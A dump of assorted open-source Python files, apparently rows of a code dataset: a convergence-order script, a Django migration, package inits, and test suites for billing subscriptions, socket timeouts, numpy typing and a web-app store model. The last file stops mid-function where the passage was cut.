| code | repo_name | path | language | license | size |
|---|---|---|---|---|---|
| stringlengths 2–1.05M | stringlengths 5–104 | stringlengths 4–251 | stringclasses 1 value | stringclasses 15 values | int32 2–1.05M |
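A minimal loading sketch, assuming this dump was exported from a Hugging Face-style dataset; the dataset path `user/python-bsd-code` below is a hypothetical placeholder, since the real dataset name is not given in this dump:

from datasets import load_dataset

# Placeholder dataset path -- the real name is not given in this dump.
ds = load_dataset("user/python-bsd-code", split="train")
for row in ds.select(range(3)):
    # Each record carries the six columns described in the header above.
    print(row["repo_name"], row["path"], row["license"], row["size"])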
"""
Computes the observed order of convergence for the velocity components and the
pressure using the solution on 4 consistently refined grids.
"""
import os
import numpy
import h5py
import pprint
def read_fields_from_hdf5(filepath, gridpath, names=()):
    """Read the field values and grids from HDF5 solution and grid files."""
    fields = {}
    with h5py.File(filepath, 'r') as f, h5py.File(gridpath, 'r') as fg:
        for name in names:
            x, y = fg[name]['x'][:], fg[name]['y'][:]
            values = f[name][:]
            fields[name] = {'values': values, 'grid': {'x': x, 'y': y}}
    return fields
def restrict_field(field, grid, atol=1.0E-12):
    """Restrict a field onto a coarser `grid` whose nodes are a subset of the field's grid."""
    def intersection(a, b, atol=atol):
        # Broadcast to a len(b) x len(a) difference table: an entry of `a` is
        # kept when it matches some entry of `b` within `atol`.
        return numpy.any(numpy.abs(a - b[:, numpy.newaxis]) <= atol, axis=0)
values, x, y = field['values'], field['grid']['x'], field['grid']['y']
mask_x = intersection(x, grid['x'], atol=atol)
mask_y = intersection(y, grid['y'], atol=atol)
return {'grid': {'x': x[mask_x], 'y': y[mask_y]},
'values': numpy.array([values[j][mask_x]
for j in range(y.size) if mask_y[j]])}
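# Example with hypothetical coordinates: a field sampled on
# x = y = [0.0, 0.25, 0.5, 0.75, 1.0], restricted onto a coarse grid with
# x = y = [0.0, 0.5, 1.0], keeps every other row and column, so a 5x5
# 'values' array becomes 3x3.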
script_dir = os.path.dirname(os.path.realpath(__file__))
root_dir = os.path.dirname(script_dir)
timestep = 500
ncells = [20, 60, 180, 540]
folders = [str(n) for n in ncells]
ratio = 3.0
fields = {}
field_names = ['u', 'v', 'p']
for folder in folders:
directory = os.path.join(root_dir, folder)
filepath = os.path.join(directory, 'solution', '{:0>7}.h5'.format(timestep))
gridpath = os.path.join(directory, 'grid.h5')
fields[folder] = read_fields_from_hdf5(filepath, gridpath, names=field_names)
# Restrict fields onto coarse grid.
for name in field_names:
fields[folder][name] = restrict_field(fields[folder][name],
fields[folders[0]][name]['grid'])
# Compute the observed orders of convergence.
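# Sketch of the three-grid estimate applied below, for a constant grid
# refinement ratio r:
#   p = log(||f_medium - f_coarse|| / ||f_fine - f_medium||) / log(r)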
def observed_order(coarse, medium, fine, name, ratio):
    """Return the observed order of convergence for the field `name`."""
    return (numpy.log(numpy.linalg.norm(medium[name]['values'] -
                                        coarse[name]['values']) /
                      numpy.linalg.norm(fine[name]['values'] -
                                        medium[name]['values'])) /
            numpy.log(ratio))

alpha = {'first': {}, 'last': {}}
# Using the first three grids.
for name in field_names:
    alpha['first'][name] = observed_order(fields[folders[0]], fields[folders[1]],
                                          fields[folders[2]], name, ratio)
# Using the last three grids.
for name in field_names:
    alpha['last'][name] = observed_order(fields[folders[1]], fields[folders[2]],
                                         fields[folders[3]], name, ratio)
pprint.pprint(alpha)
| mesnardo/PetIBM | examples/navierstokes/convergence/liddrivencavity2dRe100_20/scripts/getOrderConvergence.py | Python | bsd-3-clause | 3,069 |
# Generated by Django 2.2.6 on 2020-03-02 00:46
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('logs', '0003_logentry_username'),
]
operations = [
migrations.AlterField(
model_name='logentry',
name='timestamp',
field=models.DateTimeField(blank=True, null=True, verbose_name='timestamp'),
),
]
| bmun/huxley | huxley/logging/migrations/0004_auto_20200302_0046.py | Python | bsd-3-clause | 425 |
#!/usr/bin/python
# -*- coding: UTF-8 -*-
# __init__.py: Defines the module for musictheory.
#
# Copyright (c) 2008-2020 Peter Murphy <peterkmurphy@gmail.com>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * The names of its contributors may not be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE CONTRIBUTORS ''AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
__all__ = ["musutility", "temperament", "scales", "chords"]
__author__ = "Peter Murphy (peterkmurphy@gmail.com)"
__version__ = "0.6"
__copyright__ = "Copyright (c) 2008-2020 Peter Murphy"
__license__ = "BSD (3 clause)"
__package__ = "musictheory"
| peterkmurphy/musictheory | musictheory/__init__.py | Python | bsd-3-clause | 1,864 |
from .version import version as __version__ # noqa
from .sda_file import SDAFile
| enthought/sandia-data-archive | sdafile/__init__.py | Python | bsd-3-clause | 84 |
import random
import uuid
from datetime import date, timedelta
from django.test import TestCase
from corehq.apps.accounting.models import (
BillingAccount,
DefaultProductPlan,
SoftwarePlanEdition,
Subscription,
SubscriptionAdjustmentMethod,
)
from corehq.apps.accounting.utils.subscription import ensure_community_or_paused_subscription
from corehq.apps.domain.models import Domain
class TestExplicitUnpaidSubscriptions(TestCase):
domain = None
from_date = None
@classmethod
def setUpClass(cls):
super(TestExplicitUnpaidSubscriptions, cls).setUpClass()
cls.domain = Domain(name=str(uuid.uuid4()))
cls.domain.save()
cls.from_date = date.today()
@classmethod
def tearDownClass(cls):
cls.domain.delete()
super(TestExplicitUnpaidSubscriptions, cls).tearDownClass()
def test_no_preexisting_subscription(self):
self._assign_unpaid_subscriptions()
self.assertEqual(Subscription.visible_objects.count(), 1)
subscription = Subscription.visible_objects.all()[0]
self.assertEqual(subscription.subscriber.domain, self.domain.name)
self.assertEqual(subscription.date_start, self.from_date)
self.assertIsNone(subscription.date_end)
self.assertEqual(subscription.plan_version, self._most_recently_created_community_plan_version)
self.assertTrue(subscription.skip_invoicing_if_no_feature_charges)
def test_preexisting_current_subscription(self):
preexisting_subscription = Subscription.new_domain_subscription(
self._preexisting_subscription_account,
self.domain.name,
self._random_plan_version,
)
self._assign_unpaid_subscriptions()
self.assertEqual(Subscription.visible_objects.count(), 1)
self.assertFalse(Subscription.visible_objects.exclude(subscriber__domain=self.domain.name).exists())
self.assertEqual(Subscription.visible_objects.all()[0], preexisting_subscription)
def test_preexisting_future_subscription(self):
future_subscription_start_date = self.from_date + timedelta(days=10)
plan_version = self._random_plan_version
Subscription.new_domain_subscription(
self._preexisting_subscription_account,
self.domain.name,
plan_version,
date_start=future_subscription_start_date,
)
self._assign_unpaid_subscriptions()
self.assertEqual(Subscription.visible_objects.count(), 2)
self.assertFalse(Subscription.visible_objects.exclude(subscriber__domain=self.domain.name).exists())
self.assertIsNotNone(Subscription.visible_objects.get(
date_start=self.from_date,
date_end=future_subscription_start_date,
plan_version=self._most_recently_created_paused_plan_version,
skip_invoicing_if_no_feature_charges=True,
))
self.assertIsNotNone(Subscription.visible_objects.get(
date_start=future_subscription_start_date,
plan_version=plan_version,
))
def test_preexisting_past_subscription(self):
past_subscription_end_date = self.from_date - timedelta(days=10)
past_subscription_start_date = past_subscription_end_date - timedelta(days=5)
plan_version = self._random_plan_version
Subscription.new_domain_subscription(
self._preexisting_subscription_account,
self.domain.name,
plan_version,
date_start=past_subscription_start_date,
date_end=past_subscription_end_date,
)
self._assign_unpaid_subscriptions()
self.assertEqual(Subscription.visible_objects.count(), 2)
self.assertFalse(Subscription.visible_objects.exclude(subscriber__domain=self.domain.name).exists())
self.assertIsNotNone(Subscription.visible_objects.get(
date_start=self.from_date,
date_end=None,
plan_version=self._most_recently_created_paused_plan_version,
skip_invoicing_if_no_feature_charges=True,
))
self.assertIsNotNone(Subscription.visible_objects.get(
date_start=past_subscription_start_date,
date_end=past_subscription_end_date,
plan_version=plan_version,
))
def _assign_unpaid_subscriptions(self):
ensure_community_or_paused_subscription(
self.domain.name, self.from_date, SubscriptionAdjustmentMethod.DEFAULT_COMMUNITY
)
@property
def _most_recently_created_community_plan_version(self):
return DefaultProductPlan.get_default_plan_version(edition=SoftwarePlanEdition.COMMUNITY)
@property
def _most_recently_created_paused_plan_version(self):
return DefaultProductPlan.get_default_plan_version(edition=SoftwarePlanEdition.PAUSED)
@property
def _random_plan_version(self):
return DefaultProductPlan.get_default_plan_version(
edition=random.choice(SoftwarePlanEdition.SELF_SERVICE_ORDER[2:] + [SoftwarePlanEdition.ENTERPRISE]),
)
@property
def _preexisting_subscription_account(self):
return BillingAccount.get_or_create_account_by_domain(self.domain.name, created_by=self.domain.name)[0]
| dimagi/commcare-hq | corehq/apps/accounting/tests/test_migrations.py | Python | bsd-3-clause | 5,282 |
# flake8: noqa
"""
namespace for quantecon.tests
@author : Spencer Lyon
@date : 2014-08-01 13:13:59
"""
from .util import capture, get_data_dir, max_abs_diff
| QuantEcon/QuantEcon.py | quantecon/tests/__init__.py | Python | bsd-3-clause | 161 |
"""Unit tests for socket timeout feature."""
import functools
import unittest
from test import support
from test.support import socket_helper
# This requires the 'network' resource as given on the regrtest command line.
skip_expected = not support.is_resource_enabled('network')
import time
import errno
import socket
@functools.lru_cache()
def resolve_address(host, port):
"""Resolve an (host, port) to an address.
We must perform name resolution before timeout tests, otherwise it will be
performed by connect().
"""
with socket_helper.transient_internet(host):
return socket.getaddrinfo(host, port, socket.AF_INET,
socket.SOCK_STREAM)[0][4]
class CreationTestCase(unittest.TestCase):
"""Test case for socket.gettimeout() and socket.settimeout()"""
def setUp(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def testObjectCreation(self):
# Test Socket creation
self.assertEqual(self.sock.gettimeout(), None,
"timeout not disabled by default")
def testFloatReturnValue(self):
# Test return value of gettimeout()
self.sock.settimeout(7.345)
self.assertEqual(self.sock.gettimeout(), 7.345)
self.sock.settimeout(3)
self.assertEqual(self.sock.gettimeout(), 3)
self.sock.settimeout(None)
self.assertEqual(self.sock.gettimeout(), None)
def testReturnType(self):
# Test return type of gettimeout()
self.sock.settimeout(1)
self.assertEqual(type(self.sock.gettimeout()), type(1.0))
self.sock.settimeout(3.9)
self.assertEqual(type(self.sock.gettimeout()), type(1.0))
def testTypeCheck(self):
# Test type checking by settimeout()
self.sock.settimeout(0)
self.sock.settimeout(0.0)
self.sock.settimeout(None)
self.assertRaises(TypeError, self.sock.settimeout, "")
self.assertRaises(TypeError, self.sock.settimeout, ())
self.assertRaises(TypeError, self.sock.settimeout, [])
self.assertRaises(TypeError, self.sock.settimeout, {})
self.assertRaises(TypeError, self.sock.settimeout, 0j)
def testRangeCheck(self):
# Test range checking by settimeout()
self.assertRaises(ValueError, self.sock.settimeout, -1)
self.assertRaises(ValueError, self.sock.settimeout, -1.0)
def testTimeoutThenBlocking(self):
# Test settimeout() followed by setblocking()
self.sock.settimeout(10)
self.sock.setblocking(True)
self.assertEqual(self.sock.gettimeout(), None)
self.sock.setblocking(False)
self.assertEqual(self.sock.gettimeout(), 0.0)
self.sock.settimeout(10)
self.sock.setblocking(False)
self.assertEqual(self.sock.gettimeout(), 0.0)
self.sock.setblocking(True)
self.assertEqual(self.sock.gettimeout(), None)
def testBlockingThenTimeout(self):
# Test setblocking() followed by settimeout()
self.sock.setblocking(False)
self.sock.settimeout(1)
self.assertEqual(self.sock.gettimeout(), 1)
self.sock.setblocking(True)
self.sock.settimeout(1)
self.assertEqual(self.sock.gettimeout(), 1)
class TimeoutTestCase(unittest.TestCase):
# There are a number of tests here trying to make sure that an operation
# doesn't take too much longer than expected. But competing machine
# activity makes it inevitable that such tests will fail at times.
# When fuzz was at 1.0, I (tim) routinely saw bogus failures on Win2K
# and Win98SE. Boosting it to 2.0 helped a lot, but isn't a real
# solution.
fuzz = 2.0
localhost = socket_helper.HOST
def setUp(self):
raise NotImplementedError()
tearDown = setUp
def _sock_operation(self, count, timeout, method, *args):
"""
Test the specified socket method.
The method is run at most `count` times and must raise a TimeoutError
within `timeout` + self.fuzz seconds.
"""
self.sock.settimeout(timeout)
method = getattr(self.sock, method)
for i in range(count):
t1 = time.monotonic()
try:
method(*args)
except TimeoutError as e:
delta = time.monotonic() - t1
break
else:
self.fail('TimeoutError was not raised')
        # These checks should account for timing imprecision
self.assertLess(delta, timeout + self.fuzz)
self.assertGreater(delta, timeout - 1.0)
class TCPTimeoutTestCase(TimeoutTestCase):
"""TCP test case for socket.socket() timeout functions"""
def setUp(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addr_remote = resolve_address('www.python.org.', 80)
def tearDown(self):
self.sock.close()
@unittest.skipIf(True, 'need to replace these hosts; see bpo-35518')
def testConnectTimeout(self):
# Testing connect timeout is tricky: we need to have IP connectivity
# to a host that silently drops our packets. We can't simulate this
# from Python because it's a function of the underlying TCP/IP stack.
# So, the following Snakebite host has been defined:
blackhole = resolve_address('blackhole.snakebite.net', 56666)
# Blackhole has been configured to silently drop any incoming packets.
# No RSTs (for TCP) or ICMP UNREACH (for UDP/ICMP) will be sent back
# to hosts that attempt to connect to this address: which is exactly
# what we need to confidently test connect timeout.
# However, we want to prevent false positives. It's not unreasonable
# to expect certain hosts may not be able to reach the blackhole, due
# to firewalling or general network configuration. In order to improve
# our confidence in testing the blackhole, a corresponding 'whitehole'
# has also been set up using one port higher:
whitehole = resolve_address('whitehole.snakebite.net', 56667)
# This address has been configured to immediately drop any incoming
# packets as well, but it does it respectfully with regards to the
# incoming protocol. RSTs are sent for TCP packets, and ICMP UNREACH
# is sent for UDP/ICMP packets. This means our attempts to connect to
# it should be met immediately with ECONNREFUSED. The test case has
# been structured around this premise: if we get an ECONNREFUSED from
# the whitehole, we proceed with testing connect timeout against the
# blackhole. If we don't, we skip the test (with a message about not
# getting the required RST from the whitehole within the required
# timeframe).
# For the records, the whitehole/blackhole configuration has been set
# up using the 'pf' firewall (available on BSDs), using the following:
#
# ext_if="bge0"
#
# blackhole_ip="35.8.247.6"
# whitehole_ip="35.8.247.6"
# blackhole_port="56666"
# whitehole_port="56667"
#
# block return in log quick on $ext_if proto { tcp udp } \
# from any to $whitehole_ip port $whitehole_port
# block drop in log quick on $ext_if proto { tcp udp } \
# from any to $blackhole_ip port $blackhole_port
#
skip = True
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
timeout = support.LOOPBACK_TIMEOUT
sock.settimeout(timeout)
try:
            sock.connect(whitehole)
except TimeoutError:
pass
except OSError as err:
if err.errno == errno.ECONNREFUSED:
skip = False
finally:
sock.close()
del sock
if skip:
self.skipTest(
"We didn't receive a connection reset (RST) packet from "
"{}:{} within {} seconds, so we're unable to test connect "
"timeout against the corresponding {}:{} (which is "
"configured to silently drop packets)."
.format(
whitehole[0],
whitehole[1],
timeout,
blackhole[0],
blackhole[1],
)
)
# All that hard work just to test if connect times out in 0.001s ;-)
self.addr_remote = blackhole
with socket_helper.transient_internet(self.addr_remote[0]):
self._sock_operation(1, 0.001, 'connect', self.addr_remote)
def testRecvTimeout(self):
# Test recv() timeout
with socket_helper.transient_internet(self.addr_remote[0]):
self.sock.connect(self.addr_remote)
self._sock_operation(1, 1.5, 'recv', 1024)
def testAcceptTimeout(self):
# Test accept() timeout
socket_helper.bind_port(self.sock, self.localhost)
self.sock.listen()
self._sock_operation(1, 1.5, 'accept')
def testSend(self):
# Test send() timeout
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as serv:
socket_helper.bind_port(serv, self.localhost)
serv.listen()
self.sock.connect(serv.getsockname())
# Send a lot of data in order to bypass buffering in the TCP stack.
self._sock_operation(100, 1.5, 'send', b"X" * 200000)
def testSendto(self):
# Test sendto() timeout
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as serv:
socket_helper.bind_port(serv, self.localhost)
serv.listen()
self.sock.connect(serv.getsockname())
# The address argument is ignored since we already connected.
self._sock_operation(100, 1.5, 'sendto', b"X" * 200000,
serv.getsockname())
def testSendall(self):
# Test sendall() timeout
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as serv:
socket_helper.bind_port(serv, self.localhost)
serv.listen()
self.sock.connect(serv.getsockname())
# Send a lot of data in order to bypass buffering in the TCP stack.
self._sock_operation(100, 1.5, 'sendall', b"X" * 200000)
class UDPTimeoutTestCase(TimeoutTestCase):
"""UDP test case for socket.socket() timeout functions"""
def setUp(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def tearDown(self):
self.sock.close()
def testRecvfromTimeout(self):
# Test recvfrom() timeout
# Prevent "Address already in use" socket exceptions
socket_helper.bind_port(self.sock, self.localhost)
self._sock_operation(1, 1.5, 'recvfrom', 1024)
def test_main():
support.requires('network')
support.run_unittest(
CreationTestCase,
TCPTimeoutTestCase,
UDPTimeoutTestCase,
)
if __name__ == "__main__":
test_main()
| brython-dev/brython | www/src/Lib/test/test_timeout.py | Python | bsd-3-clause | 11,369 |
from typing import List, Any, Mapping, Tuple, SupportsIndex
import numpy as np
import numpy.typing as npt
def mode_func(
ar: npt.NDArray[np.number[Any]],
width: Tuple[int, int],
iaxis: SupportsIndex,
kwargs: Mapping[str, Any],
) -> None: ...
AR_i8: npt.NDArray[np.int64]
AR_f8: npt.NDArray[np.float64]
AR_LIKE: List[int]
reveal_type(np.pad(AR_i8, (2, 3), "constant")) # E: numpy.ndarray[Any, numpy.dtype[{int64}]]
reveal_type(np.pad(AR_LIKE, (2, 3), "constant")) # E: numpy.ndarray[Any, numpy.dtype[Any]]
reveal_type(np.pad(AR_f8, (2, 3), mode_func)) # E: numpy.ndarray[Any, numpy.dtype[{float64}]]
reveal_type(np.pad(AR_f8, (2, 3), mode_func, a=1, b=2)) # E: numpy.ndarray[Any, numpy.dtype[{float64}]]
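# A minimal runnable sketch (not part of the stub above) of the padding
# function protocol that `mode_func`'s annotations describe: np.pad calls the
# function once per axis with a rank-1, already zero-padded vector that the
# function modifies in place; extra keyword arguments arrive in `kwargs`.
import numpy as np

def fill_ends(vector, pad_width, iaxis, kwargs):
    fill = kwargs.get("fill", 0)  # `fill` is an illustrative keyword
    vector[:pad_width[0]] = fill
    if pad_width[1] > 0:
        vector[-pad_width[1]:] = fill

print(np.pad(np.arange(3), (2, 2), fill_ends, fill=9))  # [9 9 0 1 2 9 9]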
| simongibbons/numpy | numpy/typing/tests/data/reveal/arraypad.py | Python | bsd-3-clause | 728 |
# -*- coding: utf-8 -*-
import functools
import hashlib
import json
import os
import shutil
import unittest
import uuid
import zipfile
from datetime import datetime, timedelta
from django.conf import settings
from django.core import mail
from django.core.files.storage import default_storage as storage
from django.db.models.signals import post_delete, post_save
from django.test.utils import override_settings
from django.utils.translation import ugettext_lazy as _
import mock
from nose.tools import eq_, ok_, raises
import amo
from addons.models import (Addon, AddonCategory, AddonDeviceType,
BlacklistedSlug, Category, Preview, version_changed)
from addons.signals import version_changed as version_changed_signal
from amo.helpers import absolutify
from amo.tests import app_factory, version_factory
from amo.urlresolvers import reverse
from comm.utils import create_comm_thread
from constants.applications import DEVICE_TYPES
from editors.models import EscalationQueue, RereviewQueue
from files.models import File
from files.tests.test_models import UploadTest as BaseUploadTest
from files.utils import WebAppParser
from lib.crypto import packaged
from lib.crypto.tests import mock_sign
from lib.iarc.utils import (
DESC_MAPPING, INTERACTIVES_MAPPING, REVERSE_DESC_MAPPING,
REVERSE_INTERACTIVES_MAPPING)
from market.models import AddonPremium, Price
from users.models import UserProfile
from versions.models import update_status, Version
import mkt
from mkt.constants import apps
from mkt.developers.models import (AddonPaymentAccount, PaymentAccount,
SolitudeSeller)
from mkt.site.fixtures import fixture
from mkt.site.tests import DynamicBoolFieldsTestMixin
from mkt.submit.tests.test_views import BasePackagedAppTest, BaseWebAppTest
from mkt.webapps.models import (AddonExcludedRegion, AppFeatures, AppManifest,
ContentRating, Geodata, get_excluded_in,
IARCInfo, Installed, RatingDescriptors,
RatingInteractives, Webapp, WebappIndexer)
class TestWebapp(amo.tests.TestCase):
fixtures = fixture('prices')
def test_delete_reason(self):
"""Test deleting with a reason gives the reason in the mail."""
reason = u'trêason'
w = Webapp.objects.create(status=amo.STATUS_PUBLIC)
w.name = u'é'
eq_(len(mail.outbox), 0)
w.delete(msg='bye', reason=reason)
eq_(len(mail.outbox), 1)
assert reason in mail.outbox[0].body
def test_soft_deleted(self):
w = Webapp.objects.create(slug='ballin', app_slug='app-ballin',
app_domain='http://omg.org/yes',
status=amo.STATUS_PENDING)
eq_(len(Webapp.objects.all()), 1)
eq_(len(Webapp.with_deleted.all()), 1)
w.delete('boom shakalakalaka')
eq_(len(Webapp.objects.all()), 0)
eq_(len(Webapp.with_deleted.all()), 1)
# When an app is deleted its slugs and domain should get relinquished.
post_mortem = Webapp.with_deleted.filter(id=w.id)
eq_(post_mortem.count(), 1)
for attr in ('slug', 'app_slug', 'app_domain'):
eq_(getattr(post_mortem[0], attr), None)
def test_with_deleted_count(self):
w = Webapp.objects.create(slug='ballin', app_slug='app-ballin',
app_domain='http://omg.org/yes',
status=amo.STATUS_PENDING)
w.delete()
eq_(Webapp.with_deleted.count(), 1)
def test_soft_deleted_valid(self):
w = Webapp.objects.create(status=amo.STATUS_PUBLIC)
Webapp.objects.create(status=amo.STATUS_DELETED)
eq_(list(Webapp.objects.valid()), [w])
eq_(sorted(Webapp.with_deleted.valid()), [w])
def test_webapp_type(self):
webapp = Webapp()
webapp.save()
eq_(webapp.type, amo.ADDON_WEBAPP)
def test_app_slugs_separate_from_addon_slugs(self):
Addon.objects.create(type=1, slug='slug')
webapp = Webapp(app_slug='slug')
webapp.save()
eq_(webapp.slug, 'app-%s' % webapp.id)
eq_(webapp.app_slug, 'slug')
def test_app_slug_collision(self):
Webapp(app_slug='slug').save()
w2 = Webapp(app_slug='slug')
w2.save()
eq_(w2.app_slug, 'slug-1')
w3 = Webapp(app_slug='slug')
w3.save()
eq_(w3.app_slug, 'slug-2')
def test_app_slug_blocklist(self):
BlacklistedSlug.objects.create(name='slug')
w = Webapp(app_slug='slug')
w.save()
eq_(w.app_slug, 'slug~')
def test_geodata_upon_app_creation(self):
app = Webapp.objects.create(type=amo.ADDON_WEBAPP)
assert app.geodata, (
'Geodata was not created with Webapp.')
def test_get_url_path(self):
webapp = Webapp(app_slug='woo')
eq_(webapp.get_url_path(), '/app/woo/')
def test_get_api_url(self):
webapp = Webapp(app_slug='woo', pk=1)
eq_(webapp.get_api_url(), '/api/v1/apps/app/woo/')
def test_get_stats_url(self):
webapp = Webapp(app_slug='woo')
eq_(webapp.get_stats_url(), '/app/woo/statistics/')
url = webapp.get_stats_url(action='installs_series',
args=['day', '20120101', '20120201',
'json'])
eq_(url, '/app/woo/statistics/installs-day-20120101-20120201.json')
def test_get_comm_thread_url(self):
self.create_switch('comm-dashboard')
webapp = app_factory()
eq_(webapp.get_comm_thread_url(), '/comm/')
thread, note = create_comm_thread(
addon=webapp, version=webapp.versions.get(), perms=[],
action='approve', comments='lol',
profile=UserProfile.objects.create(username='lol'))
eq_(webapp.get_comm_thread_url(), '/comm/thread/%s' % thread.id)
def test_get_origin(self):
url = 'http://www.xx.com:4000/randompath/manifest.webapp'
webapp = Webapp(manifest_url=url)
eq_(webapp.origin, 'http://www.xx.com:4000')
def test_get_packaged_origin(self):
webapp = Webapp(app_domain='app://foo.com', is_packaged=True,
manifest_url='')
eq_(webapp.origin, 'app://foo.com')
    def test_punycode_domain(self):
webapp = Webapp(app_domain=u'http://www.allizôm.org')
eq_(webapp.punycode_app_domain, 'http://www.xn--allizm-mxa.org')
def test_reviewed(self):
assert not Webapp().is_unreviewed()
def test_cannot_be_purchased(self):
eq_(Webapp(premium_type=True).can_be_purchased(), False)
eq_(Webapp(premium_type=False).can_be_purchased(), False)
def test_can_be_purchased(self):
w = Webapp(status=amo.STATUS_PUBLIC, premium_type=True)
eq_(w.can_be_purchased(), True)
w = Webapp(status=amo.STATUS_PUBLIC, premium_type=False)
eq_(w.can_be_purchased(), False)
def test_get_previews(self):
w = Webapp.objects.create()
eq_(w.get_promo(), None)
p = Preview.objects.create(addon=w, position=0)
eq_(list(w.get_previews()), [p])
p.update(position=-1)
eq_(list(w.get_previews()), [])
def test_get_promo(self):
w = Webapp.objects.create()
eq_(w.get_promo(), None)
p = Preview.objects.create(addon=w, position=0)
eq_(w.get_promo(), None)
p.update(position=-1)
eq_(w.get_promo(), p)
def test_mark_done_pending(self):
w = Webapp()
eq_(w.status, amo.STATUS_NULL)
w.mark_done()
eq_(w.status, amo.WEBAPPS_UNREVIEWED_STATUS)
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_no_icon_in_manifest(self, get_manifest_json):
webapp = Webapp()
get_manifest_json.return_value = {}
eq_(webapp.has_icon_in_manifest(), False)
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_has_icon_in_manifest(self, get_manifest_json):
webapp = Webapp()
get_manifest_json.return_value = {'icons': {}}
eq_(webapp.has_icon_in_manifest(), True)
def test_no_version(self):
webapp = Webapp()
eq_(webapp.get_manifest_json(), None)
eq_(webapp.current_version, None)
def test_has_premium(self):
webapp = Webapp(premium_type=amo.ADDON_PREMIUM)
webapp._premium = mock.Mock()
webapp._premium.price = 1
eq_(webapp.has_premium(), True)
webapp._premium.price = 0
eq_(webapp.has_premium(), True)
def test_get_price_no_premium(self):
webapp = Webapp(premium_type=amo.ADDON_PREMIUM)
eq_(webapp.get_price(), None)
eq_(webapp.get_price_locale(), None)
def test_get_price(self):
webapp = amo.tests.app_factory()
self.make_premium(webapp)
eq_(webapp.get_price(region=mkt.regions.US.id), 1)
def test_get_price_tier(self):
webapp = amo.tests.app_factory()
self.make_premium(webapp)
eq_(str(webapp.get_tier().price), '1.00')
ok_(webapp.get_tier_name())
def test_get_price_tier_no_charge(self):
webapp = amo.tests.app_factory()
self.make_premium(webapp, '0.00')
eq_(str(webapp.get_tier().price), '0.00')
ok_(webapp.get_tier_name())
def test_has_no_premium(self):
webapp = Webapp(premium_type=amo.ADDON_PREMIUM)
webapp._premium = None
eq_(webapp.has_premium(), False)
def test_not_premium(self):
eq_(Webapp().has_premium(), False)
def test_get_region_ids_no_exclusions(self):
# This returns IDs for the *included* regions.
eq_(Webapp().get_region_ids(), mkt.regions.REGION_IDS)
def test_get_region_ids_with_exclusions(self):
w1 = Webapp.objects.create()
w2 = Webapp.objects.create()
AddonExcludedRegion.objects.create(addon=w1, region=mkt.regions.BR.id)
AddonExcludedRegion.objects.create(addon=w1, region=mkt.regions.US.id)
AddonExcludedRegion.objects.create(addon=w2, region=mkt.regions.UK.id)
w1_regions = list(mkt.regions.REGION_IDS)
w1_regions.remove(mkt.regions.BR.id)
w1_regions.remove(mkt.regions.US.id)
w2_regions = list(mkt.regions.REGION_IDS)
w2_regions.remove(mkt.regions.UK.id)
eq_(sorted(Webapp.objects.get(id=w1.id).get_region_ids()),
sorted(w1_regions))
eq_(sorted(Webapp.objects.get(id=w2.id).get_region_ids()),
sorted(w2_regions))
def test_get_regions_no_exclusions(self):
# This returns the class definitions for the *included* regions.
eq_(sorted(Webapp().get_regions()),
sorted(mkt.regions.REGIONS_CHOICES_ID_DICT.values()))
def test_get_regions_with_exclusions(self):
w1 = Webapp.objects.create()
w2 = Webapp.objects.create()
AddonExcludedRegion.objects.create(addon=w1, region=mkt.regions.BR.id)
AddonExcludedRegion.objects.create(addon=w1, region=mkt.regions.US.id)
AddonExcludedRegion.objects.create(addon=w2, region=mkt.regions.UK.id)
all_regions = mkt.regions.REGIONS_CHOICES_ID_DICT.values()
w1_regions = list(all_regions)
w1_regions.remove(mkt.regions.BR)
w1_regions.remove(mkt.regions.US)
w2_regions = list(all_regions)
w2_regions.remove(mkt.regions.UK)
eq_(sorted(Webapp.objects.get(id=w1.id).get_regions()),
sorted(w1_regions))
eq_(sorted(Webapp.objects.get(id=w2.id).get_regions()),
sorted(w2_regions))
def test_package_helpers(self):
app1 = app_factory()
eq_(app1.is_packaged, False)
app2 = app_factory(is_packaged=True)
eq_(app2.is_packaged, True)
def test_package_no_version(self):
webapp = Webapp.objects.create(manifest_url='http://foo.com')
eq_(webapp.is_packaged, False)
def test_assign_uuid(self):
app = Webapp()
eq_(app.guid, None)
app.save()
assert app.guid is not None, (
'Expected app to have a UUID assigned to guid')
@mock.patch.object(uuid, 'uuid4')
def test_assign_uuid_max_tries(self, mock_uuid4):
guid = 'abcdef12-abcd-abcd-abcd-abcdef123456'
mock_uuid4.return_value = uuid.UUID(guid)
        # Create another webapp and set the guid.
Webapp.objects.create(guid=guid)
# Now `assign_uuid()` should fail.
app = Webapp()
with self.assertRaises(ValueError):
app.save()
def test_is_premium_type_upgrade_check(self):
app = Webapp()
